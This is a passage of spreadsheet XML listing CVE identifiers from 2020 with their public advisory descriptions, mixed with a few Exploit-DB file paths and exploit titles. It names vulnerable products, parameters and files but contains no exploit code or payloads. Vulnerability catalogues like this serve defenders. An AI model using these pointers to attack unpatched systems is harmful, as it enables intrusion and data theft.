    <t>Persian VIP Download Script 1.0 - 'active' SQL Injection</t>
  </si>
  <si>
    <t>CVE-2020-15466</t>
  </si>
  <si>
    <t>In Wireshark 3.2.0 to 3.2.4, the GVCP dissector could go into an infinite loop. This was addressed in epan/dissectors/packet-gvcp.c by ensuring that an offset increases in all situations.</t>
  </si>
  <si>
    <t>CVE-2020-15467</t>
  </si>
  <si>
    <t>The administrative interface of Cohesive Networks vns3:vpn appliances before version 4.11.1 is vulnerable to authenticated remote code execution leading to server compromise.</t>
  </si>
  <si>
    <t>CVE-2020-15468</t>
  </si>
  <si>
    <t>Persian VIP Download Script 1.0 allows SQL Injection via the cart_edit.php active parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15469</t>
  </si>
  <si>
    <t>In QEMU 4.2.0, a MemoryRegionOps object may lack read/write callback methods, leading to a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-1547</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1551.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49044.txt</t>
  </si>
  <si>
    <t>OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure</t>
  </si>
  <si>
    <t>CVE-2020-15470</t>
  </si>
  <si>
    <t>ffjpeg through 2020-02-24 has a heap-based buffer overflow in jfif_decode in jfif.c.</t>
  </si>
  <si>
    <t>CVE-2020-15471</t>
  </si>
  <si>
    <t>In nDPI through 3.2, the packet parsing code is vulnerable to a heap-based buffer over-read in ndpi_parse_packet_line_info in lib/ndpi_main.c.</t>
  </si>
  <si>
    <t>CVE-2020-15472</t>
  </si>
  <si>
    <t>In nDPI through 3.2, the H.323 dissector is vulnerable to a heap-based buffer over-read in ndpi_search_h323 in lib/protocols/h323.c, as demonstrated by a payload packet length that is too short.</t>
  </si>
  <si>
    <t>CVE-2020-15473</t>
  </si>
  <si>
    <t>In nDPI through 3.2, the OpenVPN dissector is vulnerable to a heap-based buffer over-read in ndpi_search_openvpn in lib/protocols/openvpn.c.</t>
  </si>
  <si>
    <t>CVE-2020-15474</t>
  </si>
  <si>
    <t>In nDPI through 3.2, there is a stack overflow in extractRDNSequence in lib/protocols/tls.c.</t>
  </si>
  <si>
    <t>CVE-2020-15475</t>
  </si>
  <si>
    <t>In nDPI through 3.2, ndpi_reset_packet_line_info in lib/ndpi_main.c omits certain reinitialization, leading to a use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-15476</t>
  </si>
  <si>
    <t>In nDPI through 3.2, the Oracle protocol dissector has a heap-based buffer over-read in ndpi_search_oracle in lib/protocols/oracle.c.</t>
  </si>
  <si>
    <t>CVE-2020-15477</t>
  </si>
  <si>
    <t>The WebControl in RaspberryTortoise through 2012-10-28 is vulnerable to remote code execution via shell metacharacters in a URI. The file nodejs/raspberryTortoise.js has no validation on the parameter incomingString before passing it to the child_process.exec function.</t>
  </si>
  <si>
    <t>CVE-2020-15478</t>
  </si>
  <si>
    <t>The Journal theme before 3.1.0 for OpenCart allows exposure of sensitive data via SQL errors.</t>
  </si>
  <si>
    <t>CVE-2020-15479</t>
  </si>
  <si>
    <t>An issue was discovered in PassMark BurnInTest through 9.1, OSForensics through 7.1, and PerformanceTest through 10. The driver's IOCTL request handler attempts to copy the input buffer onto the stack without checking its size and can cause a buffer overflow. This could lead to arbitrary Ring-0 code execution and escalation of privileges. This affects DirectIo32.sys and DirectIo64.sys.</t>
  </si>
  <si>
    <t>CVE-2020-1548</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows WaasMedic Service Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15480</t>
  </si>
  <si>
    <t>An issue was discovered in PassMark BurnInTest through 9.1, OSForensics through 7.1, and PerformanceTest through 10. The kernel driver exposes IOCTL functionality that allows low-privilege users to read and write to arbitrary Model Specific Registers (MSRs). This could lead to arbitrary Ring-0 code execution and escalation of privileges. This affects DirectIo32.sys and DirectIo64.sys.</t>
  </si>
  <si>
    <t>CVE-2020-15481</t>
  </si>
  <si>
    <t>An issue was discovered in PassMark BurnInTest v9.1 Build 1008, OSForensics v7.1 Build 1012, and PerformanceTest v10.0 Build 1008. The kernel driver exposes IOCTL functionality that allows low-privilege users to map arbitrary physical memory into the address space of the calling process. This could lead to arbitrary Ring-0 code execution and escalation of privileges. This affects DirectIo32.sys and DirectIo64.sys drivers. This issue is fixed in BurnInTest v9.2, PerformanceTest v10.0 Build 1009, OSForensics v8.0.</t>
  </si>
  <si>
    <t>CVE-2020-15482</t>
  </si>
  <si>
    <t>An issue was discovered on Nescomed Multipara Monitor M1000 devices. The device enables an unencrypted TELNET service by default, with a blank password for the admin account. This allows an attacker to gain root access to the device over the local network.</t>
  </si>
  <si>
    <t>CVE-2020-15483</t>
  </si>
  <si>
    <t>An issue was discovered on Nescomed Multipara Monitor M1000 devices. The physical UART debug port provides a shell, without requiring a password, with complete access.</t>
  </si>
  <si>
    <t>CVE-2020-15484</t>
  </si>
  <si>
    <t>An issue was discovered on Nescomed Multipara Monitor M1000 devices. The internal storage of the underlying Linux system stores data in cleartext, without integrity protection against tampering.</t>
  </si>
  <si>
    <t>CVE-2020-15485</t>
  </si>
  <si>
    <t>An issue was discovered on Nescomed Multipara Monitor M1000 devices. The onboard Flash memory stores data in cleartext, without integrity protection against tampering.</t>
  </si>
  <si>
    <t>CVE-2020-15486</t>
  </si>
  <si>
    <t>An issue was discovered on Dr Trust ECG Pen 2.00.08 devices. Because the Bluetooth LE support is implemented without a requirement for pairing or security, any attacker can access the GATT server of the device and can sniff the data being broadcasted while a measurement is being done. Also, saved data can also be extracted over a Bluetooth connection. In addition, an attacker can launch a man-in-the-middle attack against data integrity.</t>
  </si>
  <si>
    <t>CVE-2020-15487</t>
  </si>
  <si>
    <t>Re:Desk 2.3 contains a blind unauthenticated SQL injection vulnerability in the getBaseCriteria() function in the protected/models/Ticket.php file. By modifying the folder GET parameter, it is possible to execute arbitrary SQL statements via a crafted URL. Unauthenticated remote command execution is possible by using this SQL injection to update certain database values, which are then executed by a bizRule eval() function in the yii/framework/web/auth/CAuthManager.php file. Resultant authorization bypass is also possible, by recovering or modifying password hashes and password reset tokens, allowing for administrative privileges to be obtained.</t>
  </si>
  <si>
    <t>CVE-2020-15488</t>
  </si>
  <si>
    <t>Re:Desk 2.3 allows insecure file upload.</t>
  </si>
  <si>
    <t>CVE-2020-15489</t>
  </si>
  <si>
    <t>An issue was discovered on Wavlink WL-WN530HG4 M30HG4.V5030.191116 devices. Multiple shell metacharacter injection vulnerabilities exist in CGI scripts, leading to remote code execution with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1549</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows CDP User Components Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1550.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48693.go</t>
  </si>
  <si>
    <t>INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-15490</t>
  </si>
  <si>
    <t>An issue was discovered on Wavlink WL-WN530HG4 M30HG4.V5030.191116 devices. Multiple buffer overflow vulnerabilities exist in CGI scripts, leading to remote code execution with root privileges. (The set of affected scripts is similar to CVE-2020-12266.)</t>
  </si>
  <si>
    <t>CVE-2020-15492</t>
  </si>
  <si>
    <t>An issue was discovered in INNEO Startup TOOLS 2017 M021 12.0.66.3784 through 2018 M040 13.0.70.3804. The sut_srv.exe web application (served on TCP port 85) includes user input into a filesystem access without any further validation. This might allow an unauthenticated attacker to read files on the server via Directory Traversal, or possibly have unspecified other impact.</t>
  </si>
  <si>
    <t>CVE-2020-15495</t>
  </si>
  <si>
    <t>Acronis True Image 2019 update 1 through 2020 on macOS allows local privilege escalation due to an insecure XPC service configuration.</t>
  </si>
  <si>
    <t>CVE-2020-15496</t>
  </si>
  <si>
    <t>Acronis True Image for Mac before 2021 Update 4 allowed local privilege escalation due to insecure folder permissions.</t>
  </si>
  <si>
    <t>CVE-2020-15497</t>
  </si>
  <si>
    <t>** DISPUTED ** jcore/portal/ajaxPortal.jsp in Jalios JCMS 10.0.2 build-20200224104759 allows XSS via the types parameter. Note: It is asserted that this vulnerability is not present in the standard installation of Jalios JCMS.</t>
  </si>
  <si>
    <t>CVE-2020-15498</t>
  </si>
  <si>
    <t>An issue was discovered on ASUS RT-AC1900P routers before 3.0.0.4.385_20253. The router accepts an arbitrary server certificate for a firmware update. The culprit is the --no-check-certificate option passed to wget tool used to download firmware update files.</t>
  </si>
  <si>
    <t>CVE-2020-15499</t>
  </si>
  <si>
    <t>An issue was discovered on ASUS RT-AC1900P routers before 3.0.0.4.385_20253. They allow XSS via spoofed Release Notes on the Firmware Upgrade page.</t>
  </si>
  <si>
    <t>CVE-2020-1550</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows CDP User Components Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1549.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49771.txt</t>
  </si>
  <si>
    <t>Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>2021-04-15</t>
  </si>
  <si>
    <t>CVE-2020-15500</t>
  </si>
  <si>
    <t>An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2020-15501</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Smarter Coffee Maker before 2nd generation allows firmware replacement without authentication or authorization. User interaction is required to press a button. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-15502</t>
  </si>
  <si>
    <t>** DISPUTED ** The DuckDuckGo application through 5.58.0 for Android, and through 7.47.1.0 for iOS, sends hostnames of visited web sites within HTTPS .ico requests to servers in the duckduckgo.com domain, which might make visit data available temporarily at a Potentially Unwanted Endpoint. NOTE: the vendor has stated "the favicon service adheres to our strict privacy policy."</t>
  </si>
  <si>
    <t>CVE-2020-15503</t>
  </si>
  <si>
    <t>LibRaw before 0.20-RC1 lacks a thumbnail size range check. This affects decoders/unpack_thumb.cpp, postprocessing/mem_image.cpp, and utils/thumb_utils.cpp. For example, malloc(sizeof(libraw_processed_image_t)+T.tlength) occurs without validating T.tlength.</t>
  </si>
  <si>
    <t>CVE-2020-15504</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in the user and admin web interfaces of Sophos XG Firewall v18.0 MR1 and older potentially allows an attacker to run arbitrary code remotely. The fix is built into the re-release of XG Firewall v18 MR-1 (named MR-1-Build396) and the v17.5 MR13 release. All other versions &gt;= 17.0 have received a hotfix.</t>
  </si>
  <si>
    <t>CVE-2020-15505</t>
  </si>
  <si>
    <t>A remote code execution vulnerability in MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-15506</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability in MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 that allows remote attackers to bypass authentication mechanisms via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-15507</t>
  </si>
  <si>
    <t>An arbitrary file reading vulnerability in MobileIron Core versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 that allows remote attackers to read files on the system via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-15509</t>
  </si>
  <si>
    <t>Nordic Semiconductor Android BLE Library through 2.2.1 and DFU Library through 1.10.4 for Android (as used by nRF Connect and other applications) can engage in unencrypted communication while showing the user that the communication is purportedly encrypted. The problem is in bond creation (e.g., internalCreateBond in BleManagerHandler).</t>
  </si>
  <si>
    <t>CVE-2020-1551</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547.</t>
  </si>
  <si>
    <t>CVE-2020-15511</t>
  </si>
  <si>
    <t>HashiCorp Terraform Enterprise up to v202006-1 contained a default signup page that allowed user registration even when disabled, bypassing SAML enforcement. Fixed in v202007-1.</t>
  </si>
  <si>
    <t>CVE-2020-15513</t>
  </si>
  <si>
    <t>The typo3_forum extension before 1.2.1 for TYPO3 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-15514</t>
  </si>
  <si>
    <t>The jh_captcha extension through 2.1.3, and 3.x through 3.0.2, for TYPO3 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-15515</t>
  </si>
  <si>
    <t>The turn extension through 0.3.2 for TYPO3 allows Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-15516</t>
  </si>
  <si>
    <t>The mm_forum extension through 1.9.5 for TYPO3 allows XSS that can be exploited via CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-15517</t>
  </si>
  <si>
    <t>The ke_search (aka Faceted Search) extension through 2.8.2, and 3.x through 3.1.3, for TYPO3 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-15518</t>
  </si>
  <si>
    <t>VeeamFSR.sys in Veeam Availability Suite before 10 and Veeam Backup &amp; Replication before 10 has no device object DACL, which allows unprivileged users to achieve total control over filesystem I/O requests.</t>
  </si>
  <si>
    <t>CVE-2020-1552</t>
  </si>
  <si>
    <t>CVE-2020-15521</t>
  </si>
  <si>
    <t>Zoho ManageEngine Applications Manager before 14 build 14730 has no protection against jsp/header.jsp Cross-site Scripting (XSS) .</t>
  </si>
  <si>
    <t>CVE-2020-15522</t>
  </si>
  <si>
    <t>Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.1.2, 1.0.2.1, and BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures.</t>
  </si>
  <si>
    <t>CVE-2020-15523</t>
  </si>
  <si>
    <t>In Python 3.6 through 3.6.10, 3.7 through 3.7.8, 3.8 through 3.8.4rc1, and 3.9 through 3.9.0b4 on Windows, a Trojan horse python3.dll might be used in cases where CPython is embedded in a native application. This occurs because python3X.dll may use an invalid search path for python3.dll loading (after Py_SetPath has been used). NOTE: this issue CANNOT occur when using python.exe from a standard (non-embedded) Python installation on Windows.</t>
  </si>
  <si>
    <t>CVE-2020-15525</t>
  </si>
  <si>
    <t>GitLab EE 11.3 through 13.1.2 has Incorrect Access Control because of the Maven package upload endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-15526</t>
  </si>
  <si>
    <t>In Redgate SQL Monitor 7.1.4 through 10.1.6 (inclusive), the scope for disabling some TLS security certificate checks can extend beyond that defined by various options on the Configuration &gt; Notifications pages to disable certificate checking for alert notifications. These TLS security checks are also ignored during monitoring of VMware machines. This would make SQL Monitor vulnerable to potential man-in-the-middle attacks when sending alert notification emails, posting to Slack or posting to webhooks. The vulnerability is fixed in version 10.1.7.</t>
  </si>
  <si>
    <t>CVE-2020-15528</t>
  </si>
  <si>
    <t>An issue was discovered in GOG Galaxy Client 2.0.17. Local escalation of privileges is possible when a user starts or uninstalls a game because of weak file permissions and missing file integrity checks.</t>
  </si>
  <si>
    <t>CVE-2020-15529</t>
  </si>
  <si>
    <t>An issue was discovered in GOG Galaxy Client 2.0.17. Local escalation of privileges is possible when a user installs a game or performs a verify/repair operation. The issue exists because of weak file permissions and can be exploited by using opportunistic locks.</t>
  </si>
  <si>
    <t>CVE-2020-1553</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15530</t>
  </si>
  <si>
    <t>An issue was discovered in Valve Steam Client 2.10.91.91. The installer allows local users to gain NT AUTHORITY\SYSTEM privileges because some parts of %PROGRAMFILES(X86)%\Steam and/or %COMMONPROGRAMFILES(X86)%\Steam have weak permissions during a critical time window. An attacker can make this time window arbitrarily long by using opportunistic locks.</t>
  </si>
  <si>
    <t>CVE-2020-15531</t>
  </si>
  <si>
    <t>Silicon Labs Bluetooth Low Energy SDK before 2.13.3 has a buffer overflow via packet data. This is an over-the-air remote code execution vulnerability in Bluetooth LE in EFR32 SoCs and associated modules running Bluetooth SDK, supporting Central or Observer roles.</t>
  </si>
  <si>
    <t>CVE-2020-15532</t>
  </si>
  <si>
    <t>Silicon Labs Bluetooth Low Energy SDK before 2.13.3 has a buffer overflow via packet data. This is an over-the-air denial of service vulnerability in Bluetooth LE in EFR32 SoCs and associated modules running Bluetooth SDK, supporting Central or Observer roles.</t>
  </si>
  <si>
    <t>CVE-2020-15533</t>
  </si>
  <si>
    <t>In Zoho ManageEngine Application Manager 14.7 Build 14730 (before 14684, and between 14689 and 14750), the AlarmEscalation module is vulnerable to unauthenticated SQL Injection attack.</t>
  </si>
  <si>
    <t>CVE-2020-15535</t>
  </si>
  <si>
    <t>An issue was discovered in the bestsoftinc Car Rental System plugin through 1.3 for WordPress. Persistent XSS can occur via any of the registration fields.</t>
  </si>
  <si>
    <t>CVE-2020-15536</t>
  </si>
  <si>
    <t>An issue was discovered in the bestsoftinc Hotel Booking System Pro plugin through 1.1 for WordPress. Persistent XSS can occur via any of the registration fields.</t>
  </si>
  <si>
    <t>CVE-2020-15537</t>
  </si>
  <si>
    <t>An issue was discovered in the Vanguard plugin 2.1 for WordPress. XSS can occur via the mails/new title field, a product field to the p/ URI, or the Products Search box.</t>
  </si>
  <si>
    <t>CVE-2020-15538</t>
  </si>
  <si>
    <t>XSS can occur in We-com Municipality portal CMS 2.1.x via the cerca/ search bar.</t>
  </si>
  <si>
    <t>CVE-2020-15539</t>
  </si>
  <si>
    <t>SQL injection can occur in We-com Municipality portal CMS 2.1.x via the cerca/ keywords field.</t>
  </si>
  <si>
    <t>CVE-2020-1554</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525.</t>
  </si>
  <si>
    <t>CVE-2020-15540</t>
  </si>
  <si>
    <t>We-com OpenData CMS 2.0 allows SQL Injection via the username field on the administrator login page.</t>
  </si>
  <si>
    <t>CVE-2020-15541</t>
  </si>
  <si>
    <t>SolarWinds Serv-U FTP server before 15.2.1 allows remote command execution.</t>
  </si>
  <si>
    <t>CVE-2020-15542</t>
  </si>
  <si>
    <t>SolarWinds Serv-U FTP server before 15.2.1 mishandles the CHMOD command.</t>
  </si>
  <si>
    <t>CVE-2020-15543</t>
  </si>
  <si>
    <t>SolarWinds Serv-U FTP server before 15.2.1 does not validate an argument path.</t>
  </si>
  <si>
    <t>CVE-2020-1555</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based), aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1380, CVE-2020-1570.</t>
  </si>
  <si>
    <t>CVE-2020-1556</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1533.</t>
  </si>
  <si>
    <t>CVE-2020-15562</t>
  </si>
  <si>
    <t>An issue was discovered in Roundcube Webmail before 1.2.11, 1.3.x before 1.3.14, and 1.4.x before 1.4.7. It allows XSS via a crafted HTML e-mail message, as demonstrated by a JavaScript payload in the xmlns (aka XML namespace) attribute of a HEAD element when an SVG element exists.</t>
  </si>
  <si>
    <t>CVE-2020-15563</t>
  </si>
  <si>
    <t>An issue was discovered in Xen through 4.13.x, allowing x86 HVM guest OS users to cause a hypervisor crash. An inverted conditional in x86 HVM guests' dirty video RAM tracking code allows such guests to make Xen de-reference a pointer guaranteed to point at unmapped space. A malicious or buggy HVM guest may cause the hypervisor to crash, resulting in Denial of Service (DoS) affecting the entire host. Xen versions from 4.8 onwards are affected. Xen versions 4.7 and earlier are not affected. Only x86 systems are affected. Arm systems are not affected. Only x86 HVM guests using shadow paging can leverage the vulnerability. In addition, there needs to be an entity actively monitoring a guest's video frame buffer (typically for display purposes) in order for such a guest to be able to leverage the vulnerability. x86 PV guests, as well as x86 HVM guests using hardware assisted paging (HAP), cannot leverage the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15564</t>
  </si>
  <si>
    <t>An issue was discovered in Xen through 4.13.x, allowing Arm guest OS users to cause a hypervisor crash because of a missing alignment check in VCPUOP_register_vcpu_info. The hypercall VCPUOP_register_vcpu_info is used by a guest to register a shared region with the hypervisor. The region will be mapped into Xen address space so it can be directly accessed. On Arm, the region is accessed with instructions that require a specific alignment. Unfortunately, there is no check that the address provided by the guest will be correctly aligned. As a result, a malicious guest could cause a hypervisor crash by passing a misaligned address. A malicious guest administrator may cause a hypervisor crash, resulting in a Denial of Service (DoS). All Xen versions are vulnerable. Only Arm systems are vulnerable. x86 systems are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-15565</t>
  </si>
  <si>
    <t>An issue was discovered in Xen through 4.13.x, allowing x86 Intel HVM guest OS users to cause a host OS denial of service or possibly gain privileges because of insufficient cache write-back under VT-d. When page tables are shared between IOMMU and CPU, changes to them require flushing of both TLBs. Furthermore, IOMMUs may be non-coherent, and hence prior to flushing IOMMU TLBs, a CPU cache also needs writing back to memory after changes were made. Such writing back of cached data was missing in particular when splitting large page mappings into smaller granularity ones. A malicious guest may be able to retain read/write DMA access to frames returned to Xen's free pool, and later reused for another purpose. Host crashes (leading to a Denial of Service) and privilege escalation cannot be ruled out. Xen versions from at least 3.2 onwards are affected. Only x86 Intel systems are affected. x86 AMD as well as Arm systems are not affected. Only x86 HVM guests using hardware assisted paging (HAP), having a passed through PCI device assigned, and having page table sharing enabled can leverage the vulnerability. Note that page table sharing will be enabled (by default) only if Xen considers IOMMU and CPU large page size support compatible.</t>
  </si>
  <si>
    <t>CVE-2020-15566</t>
  </si>
  <si>
    <t>An issue was discovered in Xen through 4.13.x, allowing guest OS users to cause a host OS crash because of incorrect error handling in event-channel port allocation. The allocation of an event-channel port may fail for multiple reasons: (1) port is already in use, (2) the memory allocation failed, or (3) the port we try to allocate is higher than what is supported by the ABI (e.g., 2L or FIFO) used by the guest or the limit set by an administrator (max_event_channels in xl cfg). Due to the missing error checks, only (1) will be considered an error. All the other cases will provide a valid port and will result in a crash when trying to access the event channel. When the administrator configured a guest to allow more than 1023 event channels, that guest may be able to crash the host. When Xen is out-of-memory, allocation of new event channels will result in crashing the host rather than reporting an error. Xen versions 4.10 and later are affected. All architectures are affected. The default configuration, when guests are created with xl/libxl, is not vulnerable, because of the default event-channel limit.</t>
  </si>
  <si>
    <t>CVE-2020-15567</t>
  </si>
  <si>
    <t>An issue was discovered in Xen through 4.13.x, allowing Intel guest OS users to gain privileges or cause a denial of service because of non-atomic modification of a live EPT PTE. When mapping guest EPT (nested paging) tables, Xen would in some circumstances use a series of non-atomic bitfield writes. Depending on the compiler version and optimisation flags, Xen might expose a dangerous partially written PTE to the hardware, which an attacker might be able to race to exploit. A guest administrator or perhaps even an unprivileged guest user might be able to cause denial of service, data corruption, or privilege escalation. Only systems using Intel CPUs are vulnerable. Systems using AMD CPUs, and Arm systems, are not vulnerable. Only systems using nested paging (hap, aka nested paging, aka in this case Intel EPT) are vulnerable. Only HVM and PVH guests can exploit the vulnerability. The presence and scope of the vulnerability depends on the precise optimisations performed by the compiler used to build Xen. If the compiler generates (a) a single 64-bit write, or (b) a series of read-modify-write operations in the same order as the source code, the hypervisor is not vulnerable. For example, in one test build using GCC 8.3 with normal settings, the compiler generated multiple (unlocked) read-modify-write operations in source-code order, which did not constitute a vulnerability. We have not been able to survey compilers; consequently we cannot say which compiler(s) might produce vulnerable code (with which code-generation options). The source code clearly violates the C rules, and thus should be considered vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-15568</t>
  </si>
  <si>
    <t>TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15569</t>
  </si>
  <si>
    <t>PlayerGeneric.cpp in MilkyTracker through 1.02.00 has a use-after-free in the PlayerGeneric destructor.</t>
  </si>
  <si>
    <t>CVE-2020-1557</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1473, CVE-2020-1558, CVE-2020-1564.</t>
  </si>
  <si>
    <t>CVE-2020-15570</t>
  </si>
  <si>
    <t>The parse_report() function in whoopsie.c in Whoopsie through 0.2.69 mishandles memory allocation failures, which allows an attacker to cause a denial of service via a malformed crash file.</t>
  </si>
  <si>
    <t>CVE-2020-15572</t>
  </si>
  <si>
    <t>Tor before 0.4.3.6 has an out-of-bounds memory access that allows a remote denial-of-service (crash) attack against Tor instances built to use Mozilla Network Security Services (NSS), aka TROVE-2020-001.</t>
  </si>
  <si>
    <t>CVE-2020-15573</t>
  </si>
  <si>
    <t>SolarWinds Serv-U File Server before 15.2.1 has a "Cross-script vulnerability," aka Case Numbers 00041778 and 00306421.</t>
  </si>
  <si>
    <t>CVE-2020-15574</t>
  </si>
  <si>
    <t>SolarWinds Serv-U File Server before 15.2.1 mishandles the Same-Site cookie attribute, aka Case Number 00331893.</t>
  </si>
  <si>
    <t>CVE-2020-15575</t>
  </si>
  <si>
    <t>SolarWinds Serv-U File Server before 15.2.1 allows XSS as demonstrated by Tenable Scan, aka Case Number 00484194.</t>
  </si>
  <si>
    <t>CVE-2020-15576</t>
  </si>
  <si>
    <t>SolarWinds Serv-U File Server before 15.2.1 allows information disclosure via an HTTP response.</t>
  </si>
  <si>
    <t>CVE-2020-15577</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. Cameralyzer allows attackers to write files to the SD card. The Samsung ID is SVE-2020-16830 (July 2020).</t>
  </si>
  <si>
    <t>CVE-2020-15578</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x) software. FactoryCamera does not properly restrict runtime permissions. The Samsung ID is SVE-2020-17270 (July 2020).</t>
  </si>
  <si>
    <t>CVE-2020-15579</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. Attackers can bypass Factory Reset Protection (FRP) via the KNOX API. The Samsung ID is SVE-2020-17318 (July 2020).</t>
  </si>
  <si>
    <t>CVE-2020-1558</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1473, CVE-2020-1557, CVE-2020-1564.</t>
  </si>
  <si>
    <t>CVE-2020-15580</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. Attackers can bypass Factory Reset Protection (FRP) by enrolling a new lock password. The Samsung ID is SVE-2020-17328 (July 2020).</t>
  </si>
  <si>
    <t>CVE-2020-15581</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. The kernel logging feature allows attackers to discover virtual addresses via vectors involving shared memory. The Samsung ID is SVE-2020-17605 (July 2020).</t>
  </si>
  <si>
    <t>CVE-2020-15582</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (Exynos 7885 chipsets) software. The Bluetooth Low Energy (BLE) component has a buffer overflow with a resultant deadlock or crash. The Samsung ID is SVE-2020-16870 (July 2020).</t>
  </si>
  <si>
    <t>CVE-2020-15583</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. StickerProvider allows directory traversal for access to system files. The Samsung ID is SVE-2020-17665 (July 2020).</t>
  </si>
  <si>
    <t>CVE-2020-15584</t>
  </si>
  <si>
